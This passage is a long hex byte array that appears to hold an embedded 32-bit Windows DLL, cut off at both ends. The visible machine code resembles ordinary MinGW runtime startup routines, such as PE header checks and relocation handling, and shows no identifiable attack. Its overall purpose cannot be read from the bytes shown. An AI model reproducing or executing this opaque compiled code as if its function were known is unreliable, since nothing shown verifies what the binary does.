xD0,0x85,0xC0,0x74,0x12,0x8B,0x55,0xD0,0x8B,0x45,0xC8,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xAC,0xC3,0xFF,0xFF,0x83,0x7D,0xF4,0x00,0x75,0x0B,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x75,0xBE,0xFF,0xFF,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x23,0x8B,0x5D,0xE0,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0x8B,0x45,0xE4,0x8B,0x55,0xF4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x0C,0xFC,0xFF,0xFF,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0x6E,0xFB,0xFF,0xFF,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE4,0x89,0x04,0x24,0xE8,0x9C,0xD1,0xFF,0xFF,0x8B,0x45,0xF4,0x8D,0x65,0xF8,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x08,0x83,0x7D,0x0C,0x03,0x74,0x25,0x83,0x7D,0x0C,0x03,0x77,0x26,0x83,0x7D,0x0C,0x02,0x74,0x1C,0x83,0x7D,0x0C,0x02,0x77,0x1A,0x83,0x7D,0x0C,0x00,0x74,0x13,0x83,0x7D,0x0C,0x01,0x75,0x0E,0xE8,0xFC,0xFC,0xFF,0xFF,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x90,0x90,0xA1,0x80,0x70,0x88,0x6C,0x8B,0x00,0x85,0xC0,0x74,0x2D,0x55,0x89,0xE5,0x83,0xEC,0x08,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xFF,0xD0,0xA1,0x80,0x70,0x88,0x6C,0x8D,0x50,0x04,0x8B,0x40,0x04,0x89,0x15,0x80,0x70,0x88,0x6C,0x85,0xC0,0x75,0xE9,0xC9,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x8B,0x1D,0x90,0x6D,0x88,0x6C,0x83,0xFB,0xFF,0x74,0x2E,0x85,0xDB,0x74,0x16,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0xFF,0x14,0x9D,0x90,0x6D,0x88,0x6C,0x83,0xEB,0x01,0x75,0xF4,0xC7,0x04,0x24,0xC0,0x5D,0x88,0x6C,0xE8,0xA8,0xB5,0xFF,0xFF,0x8B,0x5D,0xFC,0xC9,0xC3,0x8D,0x76,0x00,0x31,0xC0,0x8D,0xB6,0x00,0x00,0x00,0x00,0x89,0xC3,0x83,0xC0,0x01,0x8B,0x14,0x85,0x90,0x6D,0x88,0x6C,0x85,0xD2,0x75,0xF0,0xEB,0xB8,0x8D,0xB6,0x00,0x00,0x00,0x00,0xA1,0x20,0xCA,0x88,0x6C,0x85,0xC0,0x74,0x07,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x05,0x20,0xCA,0x88,0x6C,0x01,0x00,0x00,0x00,0xEB,0x84,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x0C,0x83,0xF8,0x03,0x74,0x12,0x85,0xC0,0x74,0x0E,0xC9,0xB8,0x01,0x00,0x00,0x00,0xC2,0x0C,0x00,0x2E,0x8D,0x74,0x26,0x00,0x89,0x44,0x24,0x04,0x8B,0x55,0x10,0x8B,0x45,0x08,0x89,0x54,0x24,0x08,0x89,0x04,0x24,0xE8,0xFA,0x06,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x83,0x3D,0x8C,0x70,0x88,0x6C,0x02,0x8B,0x45,0x0C,0x74,0x0A,0xC7,0x05,0x8C,0x70,0x88,0x6C,0x02,0x00,0x00,0x00,0x83,0xF8,0x02,0x74,0x16,0x83,0xF8,0x01,0x74,0x49,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0x74,0x26,0x00,0xBB,0x28,0xF0,0x88,0x6C,0x81,0xFB,0x28,0xF0,0x88,0x6C,0x74,0xE2,0x8D,0x76,0x00,0x8B,0x03,0x85,0xC0,0x74,0x02,0xFF,0xD0,0x83,0xC3,0x04,0x81,0xFB,0x28,0xF0,0x88,0x6C,0x75,0xED,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x8B,0x45,0x10,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x44,0x24,0x08,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x66,0x06,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x31,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x53,0x8D,0x5D,0x0C,0x83,0xEC,0x14,0xC7,0x04,0x24,0x02,0x00,0x00,0x00,0xE8,0xAA,0x0B,0x00,0x00,0xC7,0x44,0x24,0x08,0x1B,0x00,0x00,0x00,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xD8,0x82,0x88,0x6C,0xE8,0x52,0x0D,0x00,0x00,0xC7,0x04,0x24,0x02,0x00,0x00,0x00,0xE8,0x7E,0x0B,0x00,0x00,0x8B,0x55,0x08,0x89,0x5C,0x24,0x08,0x89,0x04,0x24,0x89,0x54,0x24,0x04,0xE8,0x9B,0x0D,0x00,0x00,0xE8,0x16,0x0D,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x89,0xC3,0x83,0xEC,0x3C,0x8B,0x35,0x44,0xCA,0x88,0x6C,0x85,0xF6,0x0F,0x8E,0x07,0x01,0x00,0x00,0xA1,0x48,0xCA,0x88,0x6C,0x31,0xC9,0x83,0xC0,0x0C,0x2E,0x8D,0x74,0x26,0x00,0x8B,0x10,0x39,0xD3,0x72,0x0E,0x8B,0x78,0x04,0x03,0x57,0x08,0x39,0xD3,0x0F,0x82,0x81,0x00,0x00,0x00,0x83,0xC1,0x01,0x83,0xC0,0x14,0x39,0xF1,0x75,0xE2,0x89,0x1C,0x24,0xE8,0xB2,0x07,0x00,0x00,0x89,0xC7,0x85,0xC0,0x0F,0x84,0xEF,0x00,0x00,0x00,0xA1,0x48,0xCA,0x88,0x6C,0x8D,0x1C,0xB6,0xC1,0xE3,0x02,0x01,0xD8,0x89,0x78,0x10,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0xDD,0x08,0x00,0x00,0x8B,0x15,0x48,0xCA,0x88,0x6C,0x03,0x47,0x0C,0x89,0x44,0x1A,0x0C,0x8D,0x55,0xCC,0xC7,0x44,0x24,0x08,0x1C,0x00,0x00,0x00,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xFF,0x15,0x2C,0xE1,0x88,0x6C,0x83,0xEC,0x0C,0x85,0xC0,0x0F,0x84,0x84,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8D,0x50,0xFC,0x83,0xE2,0xFB,0x74,0x08,0x8D,0x50,0xC0,0x83,0xE2,0xBF,0x75,0x12,0x83,0x05,0x44,0xCA,0x88,0x6C,0x01,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0x76,0x00,0x83,0xF8,0x02,0xBA,0x04,0x00,0x00,0x00,0xB8,0x40,0x00,0x00,0x00,0x8B,0x4D,0xD8,0x0F,0x44,0xC2,0x8B,0x55,0xCC,0x03,0x1D,0x48,0xCA,0x88,0x6C,0x89,0x4B,0x08,0x89,0x53,0x04,0x89,0x5C,0x24,0x0C,0x89,0x44,0x24,0x08,0x89,0x4C,0x24,0x04,0x89,0x14,0x24,0xFF,0x15,0x28,0xE1,0x88,0x6C,0x83,0xEC,0x10,0x85,0xC0,0x75,0xB0,0xFF,0x15,0xFC,0xE0,0x88,0x6C,0xC7,0x04,0x24,0x48,0x83,0x88,0x6C,0x89,0x44,0x24,0x04,0xE8,0x84,0xFE,0xFF,0xFF,0x8D,0x74,0x26,0x00,0x31,0xF6,0xE9,0x1F,0xFF,0xFF,0xFF,0xA1,0x48,0xCA,0x88,0x6C,0x8B,0x44,0x18,0x0C,0x89,0x44,0x24,0x08,0x8B,0x47,0x08,0xC7,0x04,0x24,0x14,0x83,0x88,0x6C,0x89,0x44,0x24,0x04,0xE8,0x59,0xFE,0xFF,0xFF,0x89,0x5C,0x24,0x04,0xC7,0x04,0x24,0xF4,0x82,0x88,0x6C,0xE8,0x49,0xFE,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x4C,0x8B,0x3D,0x40,0xCA,0x88,0x6C,0x85,0xFF,0x74,0x0D,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x05,0x40,0xCA,0x88,0x6C,0x01,0x00,0x00,0x00,0xE8,0x01,0x07,0x00,0x00,0x8D,0x04,0x80,0x8D,0x04,0x85,0x1B,0x00,0x00,0x00,0xC1,0xE8,0x04,0xC1,0xE0,0x04,0xE8,0x4C,0x09,0x00,0x00,0xC7,0x05,0x44,0xCA,0x88,0x6C,0x00,0x00,0x00,0x00,0x29,0xC4,0x8D,0x44,0x24,0x23,0x83,0xE0,0xF0,0xA3,0x48,0xCA,0x88,0x6C,0xB8,0x54,0x86,0x88,0x6C,0x2D,0x54,0x86,0x88,0x6C,0x83,0xF8,0x07,0x7E,0xA8,0x8B,0x15,0x54,0x86,0x88,0x6C,0x83,0xF8,0x0B,0x0F,0x8F,0x0E,0x01,0x00,0x00,0xBB,0x54,0x86,0x88,0x6C,0x8B,0x03,0x85,0xC0,0x0F,0x85,0xAC,0x01,0x00,0x00,0x8B,0x43,0x04,0x85,0xC0,0x0F,0x85,0xA1,0x01,0x00,0x00,0x8B,0x43,0x08,0x83,0xF8,0x01,0x0F,0x85,0x3F,0x02,0x00,0x00,0x83,0xC3,0x0C,0x81,0xFB,0x54,0x86,0x88,0x6C,0x0F,0x83,0x64,0xFF,0xFF,0xFF,0x89,0x7D,0xCC,0x89,0xDE,0xEB,0x5E,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x83,0xF9,0x08,0x0F,0x85,0x06,0x02,0x00,0x00,0x0F,0xB6,0x9F,0x00,0x00,0x88,0x6C,0x25,0xE0,0x00,0x00,0x00,0x84,0xDB,0x79,0x06,0x81,0xCB,0x00,0xFF,0xFF,0xFF,0x29,0xD3,0x8B,0x55,0xD4,0x01,0xD3,0x85,0xC0,0x75,0x0D,0x81,0xFB,0xFF,0x00,0x00,0x00,0x7F,0x6E,0x83,0xFB,0x80,0x7C,0x69,0x8B,0x45,0xD0,0xE8,0xA1,0xFD,0xFF,0xFF,0x88,0x9F,0x00,0x00,0x88,0x6C,0x83,0xC6,0x0C,0x81,0xFE,0x54,0x86,0x88,0x6C,0x0F,0x83,0xFC,0x00,0x00,0x00,0x8B,0x7E,0x04,0x8D,0x87,0x00,0x00,0x88,0x6C,0x89,0x45,0xD0,0x8B,0x06,0x8D,0x90,0x00,0x00,0x88,0x6C,0x8B,0x80,0x00,0x00,0x88,0x6C,0x89,0x45,0xD4,0x8B,0x46,0x08,0x0F,0xB6,0xC8,0x3C,0x10,0x74,0x7D,0x83,0xF9,0x20,0x75,0x80,0x8B,0x5D,0xD4,0x29,0xD3,0x03,0x9F,0x00,0x00,0x88,0x6C,0x25,0xE0,0x00,0x00,0x00,0x89,0xC1,0x0F,0x85,0xC0,0x00,0x00,0x00,0x85,0xDB,0x78,0xA9,0x8D,0x74,0x26,0x00,0x89,0x5C,0x24,0x10,0x8B,0x45,0xD4,0x89,0x44,0x24,0x0C,0x8B,0x45,0xD0,0x89,0x4C,0x24,0x04,0x89,0x44,0x24,0x08,0xC7,0x04,0x24,0xD0,0x83,0x88,0x6C,0xE8,0xBE,0xFC,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x85,0xD2,0x0F,0x85,0xA0,0x00,0x00,0x00,0xA1,0x58,0x86,0x88,0x6C,0xBB,0x60,0x86,0x88,0x6C,0x89,0xC1,0x0B,0x0D,0x5C,0x86,0x88,0x6C,0x0F,0x84,0xD7,0xFE,0xFF,0xFF,0xBB,0x54,0x86,0x88,0x6C,0xE9,0xDA,0xFE,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x0F,0xB7,0x9F,0x00,0x00,0x88,0x6C,0x25,0xE0,0x00,0x00,0x00,0x66,0x85,0xDB,0x79,0x06,0x81,0xCB,0x00,0x00,0xFF,0xFF,0x29,0xD3,0x8B,0x55,0xD4,0x01,0xD3,0x85,0xC0,0x75,0x18,0x81,0xFB,0x00,0x80,0xFF,0xFF,0x0F,0x8C,0x7A,0xFF,0xFF,0xFF,0x81,0xFB,0xFF,0xFF,0x00,0x00,0x0F,0x8F,0x6E,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x83,0xC6,0x0C,0xE8,0xA3,0xFC,0xFF,0xFF,0x66,0x89,0x9F,0x00,0x00,0x88,0x6C,0x81,0xFE,0x54,0x86,0x88,0x6C,0x0F,0x82,0x04,0xFF,0xFF,0xFF,0x8B,0x7D,0xCC,0xEB,0x5D,0x8D,0x76,0x00,0x8B,0x45,0xD0,0xE8,0x80,0xFC,0xFF,0xFF,0x89,0x9F,0x00,0x00,0x88,0x6C,0xE9,0xDA,0xFE,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xBB,0x54,0x86,0x88,0x6C,0x81,0xFB,0x54,0x86,0x88,0x6C,0x0F,0x83,0xD2,0xFD,0xFF,0xFF,0x89,0x7D,0xD4,0x8D,0x74,0x26,0x00,0x8B,0x73,0x04,0x8B,0x3B,0x83,0xC3,0x08,0x03,0xBE,0x00,0x00,0x88,0x6C,0x8D,0x86,0x00,0x00,0x88,0x6C,0xE8,0x3F,0xFC,0xFF,0xFF,0x89,0xBE,0x00,0x00,0x88,0x6C,0x81,0xFB,0x54,0x86,0x88,0x6C,0x72,0xD9,0x8B,0x7D,0xD4,0x8B,0x15,0x44,0xCA,0x88,0x6C,0x85,0xD2,0x0F,0x8E,0x93,0xFD,0xFF,0xFF,0x8B,0x1D,0x28,0xE1,0x88,0x6C,0x8D,0x75,0xE4,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x15,0x48,0xCA,0x88,0x6C,0x8D,0x04,0xBF,0x8D,0x04,0x82,0x8B,0x10,0x85,0xD2,0x74,0x1A,0x89,0x74,0x24,0x0C,0x89,0x54,0x24,0x08,0x8B,0x50,0x08,0x89,0x54,0x24,0x04,0x8B,0x40,0x04,0x89,0x04,0x24,0xFF,0xD3,0x83,0xEC,0x10,0x83,0xC7,0x01,0x3B,0x3D,0x44,0xCA,0x88,0x6C,0x7C,0xC9,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x89,0x4C,0x24,0x04,0xC7,0x04,0x24,0xA4,0x83,0x88,0x6C,0xE8,0x61,0xFB,0xFF,0xFF,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x70,0x83,0x88,0x6C,0xE8,0x51,0xFB,0xFF,0xFF,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0xF4,0xE0,0x88,0x6C,0x8B,0x1D,0x4C,0xCA,0x88,0x6C,0x83,0xEC,0x04,0x85,0xDB,0x74,0x36,0x8B,0x3D,0x24,0xE1,0x88,0x6C,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x03,0x89,0x04,0x24,0xFF,0xD7,0x89,0xC6,0x83,0xEC,0x04,0xFF,0x15,0xFC,0xE0,0x88,0x6C,0x85,0xF6,0x74,0x0C,0x85,0xC0,0x75,0x08,0x8B,0x43,0x04,0x89,0x34,0x24,0xFF,0xD0,0x8B,0x5B,0x08,0x85,0xDB,0x75,0xD7,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0x18,0xE1,0x88,0x6C,0x83,0xEC,0x04,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xA1,0x50,0xCA,0x88,0x6C,0x85,0xC0,0x75,0x07,0x31,0xC0,0xC3,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0xC7,0x44,0x24,0x04,0x0C,0x00,0x00,0x00,0xC7,0x04,0x24,0x01,0x00,0x00,0x00,0xE8,0x1D,0x08,0x00,0x00,0x89,0xC3,0x85,0xC0,0x74,0x40,0x8B,0x45,0x08,0x89,0x03,0x8B,0x45,0x0C,0x89,0x43,0x04,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0xF4,0xE0,0x88,0x6C,0xA1,0x4C,0xCA,0x88,0x6C,0x89,0x1D,0x4C,0xCA,0x88,0x6C,0x83,0xEC,0x04,0x89,0x43,0x08,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0x18,0xE1,0x88,0x6C,0x31,0xC0,0x83,0xEC,0x04,0x8B,0x5D,0xFC,0xC9,0xC3,0x83,0xC8,0xFF,0xEB,0xF6,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0xA1,0x50,0xCA,0x88,0x6C,0x8B,0x5D,0x08,0x85,0xC0,0x75,0x0D,0x8B,0x5D,0xFC,0x31,0xC0,0xC9,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0xF4,0xE0,0x88,0x6C,0xA1,0x4C,0xCA,0x88,0x6C,0x83,0xEC,0x04,0x85,0xC0,0x74,0x27,0x31,0xC9,0xEB,0x0B,0x8D,0x76,0x00,0x89,0xC1,0x85,0xD2,0x74,0x1A,0x89,0xD0,0x8B,0x10,0x39,0xDA,0x8B,0x50,0x08,0x75,0xEF,0x85,0xC9,0x74,0x2B,0x89,0x51,0x08,0x89,0x04,0x24,0xE8,0x70,0x07,0x00,0x00,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0x18,0xE1,0x88,0x6C,0x8B,0x5D,0xFC,0x31,0xC0,0x83,0xEC,0x04,0xC9,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x89,0x15,0x4C,0xCA,0x88,0x6C,0xEB,0xD0,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x8B,0x45,0x0C,0x83,0xF8,0x02,0x0F,0x84,0x9D,0x00,0x00,0x00,0x77,0x2B,0x85,0xC0,0x74,0x3F,0xA1,0x50,0xCA,0x88,0x6C,0x85,0xC0,0x0F,0x84,0xAA,0x00,0x00,0x00,0xC7,0x05,0x50,0xCA,0x88,0x6C,0x01,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0x83,0xF8,0x03,0x75,0xEB,0xA1,0x50,0xCA,0x88,0x6C,0x85,0xC0,0x74,0xE2,0xE8,0x1D,0xFE,0xFF,0xFF,0xEB,0xDB,0x8D,0x76,0x00,0xA1,0x50,0xCA,0x88,0x6C,0x85,0xC0,0x75,0x5F,0xA1,0x50,0xCA,0x88,0x6C,0x83,0xF8,0x01,0x75,0xC5,0x8B,0x1D,0x4C,0xCA,0x88,0x6C,0x85,0xDB,0x74,0x14,0x8D,0x76,0x00,0x89,0xD8,0x8B,0x5B,0x08,0x89,0x04,0x24,0xE8,0xBB,0x06,0x00,0x00,0x85,0xDB,0x75,0xEF,0xC7,0x05,0x4C,0xCA,0x88,0x6C,0x00,0x00,0x00,0x00,0xC7,0x05,0x50,0xCA,0x88,0x6C,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0xF0,0xE0,0x88,0x6C,0x83,0xEC,0x04,0xEB,0x81,0x90,0xE8,0x4B,0x04,0x00,0x00,0x8B,0x5D,0xFC,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x90,0xE8,0xAB,0xFD,0xFF,0xFF,0xEB,0x9A,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0xC7,0x04,0x24,0x54,0xCA,0x88,0x6C,0xFF,0x15,0x14,0xE1,0x88,0x6C,0x83,0xEC,0x04,0xE9,0x41,0xFF,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x31,0xD2,0x89,0xE5,0x8B,0x45,0x08,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0B,0x03,0x40,0x3C,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x06,0x89,0xD0,0x5D,0xC3,0x66,0x90,0x31,0xD2,0x66,0x81,0x78,0x18,0x0B,0x01,0x5D,0x0F,0x94,0xC2,0x89,0xD0,0xC3,0x90,0x55,0x89,0xE5,0x56,0x8B,0x55,0x08,0x53,0x8B,0x5D,0x0C,0x03,0x52,0x3C,0x0F,0xB7,0x42,0x14,0x0F,0xB7,0x72,0x06,0x8D,0x44,0x02,0x18,0x66,0x85,0xF6,0x74,0x21,0x31,0xC9,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x0C,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xF1,0x75,0xE8,0x31,0xC0,0x5B,0x5E,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x31,0xDB,0x83,0xEC,0x1C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x02,0x06,0x00,0x00,0x83,0xF8,0x08,0x77,0x72,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x75,0x67,0x8B,0x15,0x3C,0x00,0x88,0x6C,0x81,0xBA,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x8D,0x82,0x00,0x00,0x88,0x6C,0x75,0x4F,0x66,0x81,0xBA,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0x44,0x0F,0xB7,0x92,0x14,0x00,0x88,0x6C,0x0F,0xB7,0x78,0x06,0x8D,0x5C,0x10,0x18,0x66,0x85,0xFF,0x74,0x43,0x31,0xF6,0xEB,0x11,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xC6,0x01,0x83,0xC3,0x28,0x39,0xFE,0x74,0x2E,0x8B,0x45,0x08,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x1C,0x24,0x89,0x44,0x24,0x04,0xE8,0x97,0x05,0x00,0x00,0x85,0xC0,0x75,0xDB,0x83,0xC4,0x1C,0x89,0xD8,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x83,0xC4,0x1C,0x31,0xDB,0x89,0xD8,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0x74,0x26,0x00,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x75,0x18,0x8B,0x0D,0x3C,0x00,0x88,0x6C,0x81,0xB9,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x8D,0x91,0x00,0x00,0x88,0x6C,0x74,0x0B,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x66,0x81,0xB9,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0xEA,0x55,0x0F,0xB7,0x81,0x14,0x00,0x88,0x6C,0x8D,0x44,0x02,0x18,0x89,0xE5,0x56,0x0F,0xB7,0xB1,0x06,0x00,0x88,0x6C,0x53,0x8B,0x5D,0x08,0x81,0xEB,0x00,0x00,0x88,0x6C,0x66,0x85,0xF6,0x74,0x20,0x31,0xC9,0x8D,0xB6,0x00,0x00,0x00,0x00,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x0C,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xCE,0x75,0xE8,0x31,0xC0,0x5B,0x5E,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x75,0x12,0x8B,0x15,0x3C,0x00,0x88,0x6C,0x81,0xBA,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x74,0x01,0xC3,0x66,0x81,0xBA,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0xF4,0x0F,0xB7,0x82,0x06,0x00,0x88,0x6C,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x2E,0x8D,0x74,0x26,0x00,0x55,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x89,0xE5,0x53,0x8B,0x4D,0x08,0x75,0x18,0x8B,0x1D,0x3C,0x00,0x88,0x6C,0x81,0xBB,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x8D,0x93,0x00,0x00,0x88,0x6C,0x74,0x0C,0x8B,0x5D,0xFC,0xC9,0xC3,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x81,0xBB,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0xE9,0x0F,0xB7,0x83,0x14,0x00,0x88,0x6C,0x0F,0xB7,0x9B,0x06,0x00,0x88,0x6C,0x8D,0x44,0x02,0x18,0x66,0x85,0xDB,0x74,0x1D,0x31,0xD2,0x8D,0x74,0x26,0x00,0xF6,0x40,0x27,0x20,0x74,0x07,0x85,0xC9,0x74,0xC2,0x83,0xE9,0x01,0x83,0xC2,0x01,0x83,0xC0,0x28,0x39,0xDA,0x75,0xE9,0x8B,0x5D,0xFC,0x31,0xC0,0xC9,0xC3,0x66,0x90,0x31,0xC0,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x75,0x12,0x8B,0x15,0x3C,0x00,0x88,0x6C,0x81,0xBA,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x74,0x01,0xC3,0x66,0x81,0xBA,0x18,0x00,0x88,0x6C,0x0B,0x01,0xBA,0x00,0x00,0x88,0x6C,0x0F,0x44,0xC2,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x31,0xD2,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x75,0x17,0xA1,0x3C,0x00,0x88,0x6C,0x81,0xB8,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x8D,0x88,0x00,0x00,0x88,0x6C,0x74,0x0C,0x89,0xD0,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x90,0x66,0x81,0xB8,0x18,0x00,0x88,0x6C,0x0B,0x01,0x75,0xE9,0x55,0x0F,0xB7,0x80,0x14,0x00,0x88,0x6C,0x8D,0x44,0x01,0x18,0x89,0xE5,0x56,0x53,0x8B,0x5D,0x08,0x0F,0xB7,0x71,0x06,0x81,0xEB,0x00,0x00,0x88,0x6C,0x66,0x85,0xF6,0x74,0x1D,0x31,0xC9,0x90,0x8B,0x50,0x0C,0x39,0xD3,0x72,0x07,0x03,0x50,0x08,0x39,0xD3,0x72,0x12,0x83,0xC1,0x01,0x83,0xC0,0x28,0x39,0xCE,0x75,0xE8,0x31,0xD2,0x5B,0x89,0xD0,0x5E,0x5D,0xC3,0x8B,0x50,0x24,0x5B,0x5E,0x5D,0xF7,0xD2,0xC1,0xEA,0x1F,0x89,0xD0,0xC3,0x66,0x90,0x55,0x31,0xC9,0x66,0x81,0x3D,0x00,0x00,0x88,0x6C,0x4D,0x5A,0x89,0xE5,0x57,0x56,0x53,0x8B,0x5D,0x08,0x75,0x17,0xA1,0x3C,0x00,0x88,0x6C,0x81,0xB8,0x00,0x00,0x88,0x6C,0x50,0x45,0x00,0x00,0x8D,0xB0,0x00,0x00,0x88,0x6C,0x74,0x0B,0x5B,0x89,0xC8,0x5E,0x5F,0x